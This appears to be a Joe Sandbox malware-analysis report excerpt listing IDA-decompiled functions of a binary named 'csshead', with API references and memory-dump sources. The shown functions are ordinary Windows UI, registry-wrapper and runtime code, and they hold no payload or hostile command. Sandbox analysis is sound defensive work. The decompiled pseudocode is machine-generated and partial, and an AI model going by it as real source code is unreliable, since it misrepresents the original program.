			E00403B50(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				struct HINSTANCE__* _t12;
				_Unknown_base(*)()* _t13;
				intOrPtr* _t26;

				_t26 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						goto ( *0x433004);
					}
					goto L6;
				} else {
					_t12 = GetModuleHandleA("Advapi32.dll");
					if(_t12 == 0) {
						L6:
						return 1;
					} else {
						_t13 = GetProcAddress(_t12, "RegCreateKeyTransactedA");
						if(_t13 == 0) {
							goto L6;
						} else {
							return  *_t13(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t26, 0);
						}
					}
				}
			}

0x00403b51
0x00403b56
0x00403bb3
0x00403bb6
0x00403bb6
0x00000000
0x00403b58
0x00403b5d
0x00403b65
0x00403bbc
0x00403bc2
0x00403b67
0x00403b6d
0x00403b75
0x00000000
0x00403b77
0x00403bac
0x00403bac
0x00403b75
0x00403b65

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00403B5D
GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00403B6D

Strings

RegCreateKeyTransactedA, xrefs: 00403B67
Advapi32.dll, xrefs: 00403B58

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00403BD0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
library

C-Code - Quality: 58%

			E00403BD0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				intOrPtr* _t12;

				_t12 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) != 0) {
						goto ( *0x433000);
					}
					goto L6;
				} else {
					_t5 = GetModuleHandleA("Advapi32.dll");
					if(_t5 == 0) {
						L6:
						return 1;
					} else {
						_t6 = GetProcAddress(_t5, "RegDeleteKeyTransactedA");
						if(_t6 == 0) {
							goto L6;
						} else {
							return  *_t6(_a4, _a8, 0, 0,  *_t12, 0);
						}
					}
				}
			}

0x00403bd1
0x00403bd6
0x00403c14
0x00403c17
0x00403c17
0x00000000
0x00403bd8
0x00403bdd
0x00403be5
0x00403c1d
0x00403c23
0x00403be7
0x00403bed
0x00403bf5
0x00000000
0x00403bf7
0x00403c0d
0x00403c0d
0x00403bf5
0x00403be5

APIs

GetModuleHandleA.KERNEL32(Advapi32.dll,?,00403D77,?,?,00000000,00407F6E,?), ref: 00403BDD
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00403BED

Strings

RegDeleteKeyTransactedA, xrefs: 00403BE7
Advapi32.dll, xrefs: 00403BD8

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00413570, Relevance: 6.1, APIs: 4, Instructions: 119

APIs

GetCapture.USER32 ref: 00413587
ClientToScreen.USER32(?,?), ref: 004135BE
GetWindowRect.USER32(?,?), ref: 004135E3

Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382

PtInRect.USER32(?,?,?), ref: 00413659

Part of subcall function 00412EB0: DeleteDC.GDI32(00000000), ref: 00412ED3

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041FF00, Relevance: 6.1, APIs: 4, Instructions: 105
window

C-Code - Quality: 100%

			E0041FF00(void* __ecx, signed short _a8, intOrPtr _a12, int* _a16) {
				char _v255;
				void* _v256;
				struct HWND__* _t18;
				signed short _t24;
				struct HINSTANCE__* _t25;
				int _t26;
				signed char _t35;
				void* _t45;
				void* _t53;
				signed short _t55;
				void* _t59;
				void* _t60;

				_t59 =  &_v256;
				_t53 = __ecx;
				 *_a16 = 0;
				_t18 =  *(__ecx + 0x30);
				if(_t18 == 0) {
					L21:
					return 1;
				} else {
					_t55 = _a8;
					_t35 = _t55 >> 0x10;
					if(_t35 != 0xffff || _a12 != 0) {
						_v256 = 0;
						E00422840( &_v255, 0, 0xff);
						_t60 = _t59 + 0xc;
						if((_t35 & 0x00000010) == 0) {
							_t24 = _t55 & 0x0000ffff;
							if(_t55 < 0xf000 || _t55 >= 0xf1f0) {
								if(_t55 < 0xe110 || _t55 > 0xe11f) {
									if(_t55 >= 0xff00 && _t55 <= 0xfffd) {
										_t24 = 0xef1f;
									}
								} else {
									_t24 = 0xefda;
								}
							} else {
								_t24 = ((_t55 & 0x0000ffff) - 0x0000f000 >> 0x00000004) - 0x00001100 & 0x0000ffff;
							}
							_t25 =  *0x442b94; // 0x0
							_t26 = LoadStringA(_t25, _t24 & 0x0000ffff,  &_v256, 0x100);
							_t45 = 0;
							if(_t26 > 0) {
								while( *((intOrPtr*)(_t60 + _t45 + 0xc)) != 0xa) {
									_t45 = _t45 + 1;
									if(_t45 < _t26) {
										continue;
									} else {
									}
									goto L20;
								}
								 *((char*)(_t60 + _t45 + 0xc)) = 0;
							}
						}
						L20:
						SendMessageA( *(_t53 + 0x30), 0x409, 1, 0);
						SendMessageA( *(_t53 + 0x30), 0x401, 0x1ff,  &_v256);
						goto L21;
					} else {
						SendMessageA(_t18, 0x409, 0, 0);
						return 1;
					}
				}
			}

0x0041ff04
0x0041ff0b
0x0041ff0d
0x0041ff13
0x0041ff18
0x00420040
0x0042004c
0x0041ff1e
0x0041ff20
0x0041ff29
0x0041ff34
0x0041ff6d
0x0041ff72
0x0041ff77
0x0041ff7d
0x0041ff88
0x0041ff8e
0x0041ffb4
0x0041ffcf
0x0041ffdb
0x0041ffdb
0x0041ffc0
0x0041ffc0
0x0041ffc0
0x0041ff9a
0x0041ffa7
0x0041ffa7
0x0041ffe8
0x0041fff4
0x0041fffa
0x0041fffe
0x00420002
0x00420008
0x0042000b
0x00000000
0x00000000
0x0042000d
0x00000000
0x0042000b
0x0042000f
0x0042000f
0x0041fffe
0x00420014
0x00420027
0x0042003c
0x00000000
0x0041ff40
0x0041ff4a
0x0041ff5e
0x0041ff5e
0x0041ff34

APIs

SendMessageA.USER32(?,00000409,00000000,00000000), ref: 0041FF4A
LoadStringA.USER32(00000000,?,?,00000100), ref: 0041FFF4
SendMessageA.USER32(?,00000409,00000001,00000000), ref: 00420027
SendMessageA.USER32(?,00000401,000001FF,?), ref: 0042003C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 0041D5C9, Relevance: 6.1, APIs: 4, Instructions: 97windowcomfile

APIs

Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA

GetCursorPos.USER32(?), ref: 0041D5B8
DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
OleInitialize.OLE32(00000000), ref: 0041D929
RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
GetTopWindow.USER32(00000000), ref: 0041D946
RevokeDragDrop.OLE32(00000000), ref: 0041D94D
OleUninitialize.OLE32 ref: 0041D96B
SetMenuItemInfoA.USER32 ref: 0041D9B2
GetLastError.KERNEL32 ref: 0041D9BC
DrawMenuBar.USER32(00000000), ref: 0041D9C5
GetMenuItemInfoA.USER32 ref: 0041D9FA
BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
EndPaint.USER32(00442AA8,?), ref: 0041DA1E
GetClientRect.USER32 ref: 0041DA38
EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00411530, Relevance: 6.1, APIs: 4, Instructions: 90
window

C-Code - Quality: 100%

			E00411530(signed int __eax, void* __ecx, signed int _a4) {
				signed char _v4;
				signed char _v8;
				signed char _v12;
				signed char _v16;
				void* _v20;
				struct tagRECT _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				signed char _v56;
				signed char _t38;
				signed int _t47;
				void* _t55;
				int _t57;

				_t47 = _a4;
				_t55 = __ecx;
				if(_t47 != 0xffffffff) {
					_v36.top = 0;
					_v36.right = 0;
					_v36.bottom = 0;
					_v36.left = 0;
					GetClientRect( *(__ecx + 4),  &_v36);
					_t38 = GetMenuItemCount( *(_t55 + 0x44));
					_t57 = _t47 + 1;
					_v56 = _t38;
					if(_t57 == _t47) {
						L10:
						return _t38 | 0xffffffff;
					} else {
						L4:
						L4:
						if(_t57 >= _v56) {
							_t57 = 0;
						}
						_v16 = 0;
						_v12 = 0;
						_v8 = 0;
						_v4 = 0;
						_v20 = 0;
						SendMessageA( *(_t55 + 4), 0x417, _t57,  &_v20);
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v52 = 0;
						_t38 = SendMessageA( *(_t55 + 4), 0x41d, _t57,  &_v52);
						if(_v44 > _v36.right) {
							goto L11;
						}
						_t38 = _v12;
						if((_t38 & 0x00000004) == 0 || (_t38 & 0x00000008) != 0) {
							_t57 = _t57 + 1;
							if(_t57 != _a4) {
								goto L4;
							} else {
								goto L10;
							}
						} else {
							L12:
							if(_t57 == _a4) {
								goto L10;
							} else {
								return _t57;
							}
						}
						goto L14;
						L11:
						_t57 = 0xfffffffe;
						goto L12;
					}
				} else {
					return __eax | _t47;
				}
				L14:
			}

0x00411534
0x00411539
0x0041153e
0x00411551
0x00411555
0x00411559
0x00411565
0x00411569
0x00411573
0x00411579
0x0041157c
0x00411582
0x004115ff
0x00411609
0x00411584
0x00000000
0x00411590
0x00411594
0x00411596
0x00411596
0x0041159d
0x004115a1
0x004115a5
0x004115a9
0x004115b9
0x004115bd
0x004115c7
0x004115cb
0x004115cf
0x004115dc
0x004115e0
0x004115ea
0x00000000
0x00000000
0x004115ec
0x004115f2
0x004115f8
0x004115fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00411611
0x00411611
0x00411615
0x00000000
0x00411617
0x00411620
0x00411620
0x00411615
0x00000000
0x0041160c
0x0041160c
0x00000000
0x0041160c
0x00411541
0x00411547
0x00411547
0x00000000

APIs

GetClientRect.USER32(?,?), ref: 00411569
GetMenuItemCount.USER32(?), ref: 00411573
SendMessageA.USER32(?,00000417,?,?), ref: 004115BD
SendMessageA.USER32(?,0000041D,?,?), ref: 004115E0

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00411440, Relevance: 6.1, APIs: 4, Instructions: 88
window

C-Code - Quality: 100%

			E00411440(signed int __eax, void* __ecx, signed int _a4) {
				signed char _v4;
				signed char _v8;
				signed char _v12;
				signed char _v16;
				void* _v20;
				struct tagRECT _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				signed char _t36;
				signed int _t46;
				void* _t54;
				int _t56;

				_t46 = _a4;
				_t54 = __ecx;
				if(_t46 != 0xffffffff) {
					_v36.top = 0;
					_v36.right = 0;
					_v36.bottom = 0;
					_v36.left = 0;
					_t36 = GetClientRect( *(__ecx + 4),  &_v36);
					_t56 = _t46 - 1;
					if(_t56 == _t46) {
						L10:
						return _t36 | 0xffffffff;
					} else {
						L4:
						L4:
						if(_t56 < 0) {
							_t10 = GetMenuItemCount( *(_t54 + 0x44)) - 1; // -1
							_t56 = _t10;
						}
						_v16 = 0;
						_v12 = 0;
						_v8 = 0;
						_v4 = 0;
						_v20 = 0;
						SendMessageA( *(_t54 + 4), 0x417, _t56,  &_v20);
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v52 = 0;
						_t36 = SendMessageA( *(_t54 + 4), 0x41d, _t56,  &_v52);
						if(_v44 > _v36.right) {
							goto L11;
						}
						_t36 = _v12;
						if((_t36 & 0x00000004) == 0 || (_t36 & 0x00000008) != 0) {
							_t56 = _t56 - 1;
							if(_t56 != _a4) {
								goto L4;
							} else {
								goto L10;
							}
						} else {
							L12:
							if(_t56 == _a4) {
								goto L10;
							} else {
								return _t56;
							}
						}
						goto L14;
						L11:
						_t56 = 0xfffffffe;
						goto L12;
					}
				} else {
					return __eax | _t46;
				}
				L14:
			}

0x00411444
0x00411449
0x0041144e
0x00411461
0x00411465
0x00411469
0x00411475
0x00411479
0x0041147f
0x00411484
0x00411508
0x00411512
0x0041148a
0x00000000
0x00411490
0x00411492
0x0041149e
0x0041149e
0x0041149e
0x004114a6
0x004114aa
0x004114ae
0x004114b2
0x004114c2
0x004114c6
0x004114d0
0x004114d4
0x004114d8
0x004114e5
0x004114e9
0x004114f3
0x00000000
0x00000000
0x004114f5
0x004114fb
0x00411501
0x00411506
0x00000000
0x00000000
0x00000000
0x00000000
0x0041151a
0x0041151a
0x0041151e
0x00000000
0x00411520
0x00411529
0x00411529
0x0041151e
0x00000000
0x00411515
0x00411515
0x00000000
0x00411515
0x00411451
0x00411457
0x00411457
0x00000000

APIs

GetClientRect.USER32(?,?), ref: 00411479
GetMenuItemCount.USER32(?), ref: 00411498
SendMessageA.USER32(?,00000417,?,?), ref: 004114C6
SendMessageA.USER32(?,0000041D,?,?), ref: 004114E9

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00418ED0, Relevance: 6.1, APIs: 4, Instructions: 87window

APIs

GetMenuItemCount.USER32 ref: 00418EEB
DestroyMenu.USER32 ref: 00418F15
MapWindowPoints.USER32(?,00000000,?,00000002), ref: 00418F46
PtInRect.USER32(00000000,00000000,?), ref: 00418F9D

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00420A00, Relevance: 6.1, APIs: 4, Instructions: 83

APIs

GetCurrentProcess.KERNEL32 ref: 00420A36
FlushInstructionCache.KERNEL32(00000000), ref: 00420A3D
CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00442B90,?), ref: 00420AD1

Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,004124FE), ref: 00421EB2
Part of subcall function 00421F2E: RtlAllocateHeap.NTDLL(00000000), ref: 00421EB9
Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,004124FE), ref: 00421EDD
Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004124FE), ref: 00421F05
Part of subcall function 00421F2E: RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 00421F1C

SetLastError.KERNEL32(0000000E), ref: 00420A57

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00420A00, Relevance: 6.1, APIs: 4, Instructions: 83

C-Code - Quality: 100%

			E00420A00(struct HMENU__* __ecx, struct HWND__* _a4, int* _a8, CHAR* _a12, long _a16, long _a20, struct HMENU__* _a24, signed short _a28, void* _a32) {
				void* _t23;
				int* _t27;
				intOrPtr _t33;
				long _t36;
				void* _t40;
				struct HMENU__* _t47;
				struct HMENU__* _t49;
				struct HINSTANCE__* _t51;
				signed short _t56;

				_t49 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1c)) != 0) {
					L2:
					_t23 =  *(_t49 + 0x1c);
					_t40 = 0xfffffff3 - _t23;
					 *_t23 = 0x42444c7;
					 *((intOrPtr*)(_t23 + 4)) = 0;
					 *((char*)(_t23 + 8)) = 0xe9;
					 *((intOrPtr*)(_t23 + 9)) = 0xfffffff3;
					FlushInstructionCache(GetCurrentProcess(), _t23, 0xd);
					_t56 = _a28;
					if(_t56 != 0) {
						L004080F0(_t40, _t49 + 0x10, _t49);
						_t47 = _a24;
						_t36 = _a16;
						if(_t47 == 0 && (_t36 & 0x40000000) != 0) {
							_t47 = _t49;
							_a24 = _t47;
						}
						_t27 = _a8;
						if(_t27 == 0) {
							_t27 = 0x440000;
							_a8 = 0x440000;
						}
						_t17 =  &(_t27[1]); // 0x80000000
						_t51 =  *0x442b90; // 0x0
						_t19 =  &(_t27[3]); // 0x0
						_t20 =  &(_t27[2]); // 0x0
						return CreateWindowExA(_a20, _t56 & 0x0000ffff, _a12, _t36,  *_t27,  *_t17,  *_t20 -  *_t27,  *_t19 -  *_t17, _a4, _t47, _t51, _a32);
					} else {
						return 0;
					}
				} else {
					_t33 = L00421F2E();
					 *((intOrPtr*)(__ecx + 0x1c)) = _t33;
					if(_t33 == 0) {
						SetLastError(0xe);
						return 0;
					} else {
						goto L2;
					}
				}
			}

0x00420a01
0x00420a07
0x00420a15
0x00420a15
0x00420a1f
0x00420a22
0x00420a28
0x00420a2f
0x00420a33
0x00420a3d
0x00420a44
0x00420a4c
0x00420a6a
0x00420a6f
0x00420a73
0x00420a7c
0x00420a86
0x00420a88
0x00420a88
0x00420a8c
0x00420a92
0x00420a94
0x00420a99
0x00420a99
0x00420aa1
0x00420aa7
0x00420ab4
0x00420ab7
0x00420adb
0x00420a4e
0x00420a52
0x00420a52
0x00420a09
0x00420a09
0x00420a0e
0x00420a13
0x00420a57
0x00420a60
0x00000000
0x00000000
0x00000000
0x00420a13

APIs

GetCurrentProcess.KERNEL32 ref: 00420A36
FlushInstructionCache.KERNEL32(00000000,?,004099BD,?,?,?,?,?,?,?,?), ref: 00420A3D
SetLastError.KERNEL32(0000000E,?,004099BD,?,?,?,?,?,?,?,?), ref: 00420A57

Part of subcall function 004080F0: GetCurrentThreadId.KERNEL32 ref: 00408103
Part of subcall function 004080F0: EnterCriticalSection.KERNEL32(00442B64), ref: 00408111
Part of subcall function 004080F0: LeaveCriticalSection.KERNEL32(00442B64), ref: 0040812A
Part of subcall function 004080F0: RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,00000000,80004005), ref: 0040813D

CreateWindowExA.USER32(?,?,?,?,?,00000000,000000E9,?,?,?,00000000,?), ref: 00420AD1

Part of subcall function 00421F2E: GetProcessHeap.KERNEL32(00000000,0000000D,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EB2
Part of subcall function 00421F2E: HeapAlloc.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EB9
Part of subcall function 00421F2E: InterlockedPopEntrySList.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421ECC
Part of subcall function 00421F2E: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,?,0040892B,00000000,(XC,0043C9F8), ref: 00421EDD
Part of subcall function 00421F2E: InterlockedPopEntrySList.KERNEL32(?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421EF5
Part of subcall function 00421F2E: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40), ref: 00421F05
Part of subcall function 00421F2E: InterlockedPushEntrySList.KERNEL32(00000000,?,?,0040892B,00000000,(XC,0043C9F8,?,?,?,?,?,?,00432D40,000000FF), ref: 00421F1C

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 004202C0, Relevance: 6.1, APIs: 4, Instructions: 80window

APIs

SendMessageA.USER32(?,00000229,00000000,00000000), ref: 004202D1
SetWindowLongA.USER32(?,000000EC,00000000), ref: 0042034C
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000137), ref: 00420365
GetClientRect.USER32(?,?), ref: 00420378

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041E750, Relevance: 6.1, APIs: 4, Instructions: 66
window

C-Code - Quality: 93%

			E0041E750(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				int _t19;
				long _t31;
				long _t38;
				struct HWND__* _t42;
				void* _t43;
				struct HWND__* _t44;
				long _t46;

				_t46 =  *0x441340; // 0x1
				_t43 = __ecx;
				_t42 =  *(__ecx + 0x2c);
				 *0x441340 = 0 | _t46 == 0x00000000;
				_t19 = SendMessageA(_t42, 0x410, 0xeb01, 0);
				_t31 =  *0x441340; // 0x1
				SendMessageA(_t42, 0x423, _t19, _t31);
				_t38 =  *0x441340; // 0x1
				L0041E230(_t43 + 0x54, 0xe800, _t38, 0);
				_v28.top = 0;
				_v28.right = 0;
				_v28.bottom = 0;
				_v28.left = 0;
				GetClientRect( *(_t43 + 4),  &_v28);
				_push(1);
				L00418760(_t43,  &_v28);
				_t44 =  *(_t43 + 0x34);
				if(_t44 != 0) {
					SetWindowPos(_t44, 0, _v28.right, _v28.bottom, _v12 - _v28.right, _v8 - _v28.bottom, 0x14);
				}
				return 0;
			}

0x0041e75d
0x0041e76e
0x0041e770
0x0041e779
0x0041e77e
0x0041e780
0x0041e78e
0x0041e790
0x0041e7a1
0x0041e7ab
0x0041e7af
0x0041e7b3
0x0041e7bd
0x0041e7c5
0x0041e7cb
0x0041e7d4
0x0041e7d9
0x0041e7de
0x0041e7fd
0x0041e7fd
0x0041e80b

APIs

SendMessageA.USER32(?,00000410,0000EB01,00000000), ref: 0041E77E
SendMessageA.USER32(?,00000423,00000000,00000001), ref: 0041E78E
GetClientRect.USER32(?,?), ref: 0041E7C5

Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 0041877C
Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
Part of subcall function 00418760: GetWindowLongA.USER32(?,000000F0), ref: 004187E4
Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E7FD

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00410EB0, Relevance: 6.1, APIs: 4, Instructions: 65thread

APIs

GetActiveWindow.USER32 ref: 00410EDF
GetWindowThreadProcessId.USER32(00000000), ref: 00410EE6
GetCurrentProcessId.KERNEL32 ref: 00410EEC
IsWindowEnabled.USER32(?), ref: 00410EFD

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00412A20, Relevance: 6.1, APIs: 4, Instructions: 63string

APIs

lstrlen.KERNEL32(?,?,00000000,?,0043347C), ref: 00412A33
SetTextColor.GDI32(00000000,?), ref: 00412A5B
DrawTextA.USER32(00000000,?,00000000,?,?), ref: 00412A81
DrawTextA.USER32(0000002C,00000001,000000FF,?,?), ref: 00412AB1

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0041E810, Relevance: 6.1, APIs: 4, Instructions: 61window

APIs

IsWindowVisible.USER32(?), ref: 0041E81B
ShowWindow.USER32(?,00000001), ref: 0041E836
GetClientRect.USER32(?,?), ref: 0041E86B

Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 00418796
Part of subcall function 00418760: InvalidateRect.USER32(?,00000000,00000001), ref: 004187A4
Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 004187C9
Part of subcall function 00418760: SendMessageA.USER32(?,00000005,00000000,00000000), ref: 004187FE
Part of subcall function 00418760: GetWindowRect.USER32(?,?), ref: 00418823

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000014), ref: 0041E8A3

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00421E10, Relevance: 6.0, APIs: 4, Instructions: 47

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00421EA0,?,?,004124FE), ref: 00421E12
RtlAllocateHeap.NTDLL(00000000), ref: 00421E44
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00421E5A
HeapFree.KERNEL32(00000000,?,?,?,?,?,004124FE), ref: 00421E6A

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00425504, Relevance: 6.0, APIs: 4, Instructions: 47LIBRARYCODE

APIs

__getptd.LIBCMT ref: 00425510

Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB

__amsg_exit.LIBCMT ref: 00425530

Part of subcall function 0042C08B: __amsg_exit.LIBCMT ref: 0042C0AD
Part of subcall function 0042C08B: RtlEnterCriticalSection.NTDLL(?), ref: 0042C0B5

InterlockedDecrement.KERNEL32(?), ref: 0042555D

Part of subcall function 00422804: RtlFreeHeap.NTDLL(00000000,00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042281A
Part of subcall function 00422804: GetLastError.KERNEL32(00000000,?,00425EDC,00000000,?,?,00417F96,00000009), ref: 0042282C

InterlockedIncrement.KERNEL32(00441D00), ref: 00425588

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0040485C, Relevance: 6.0, APIs: 4, Instructions: 46
file

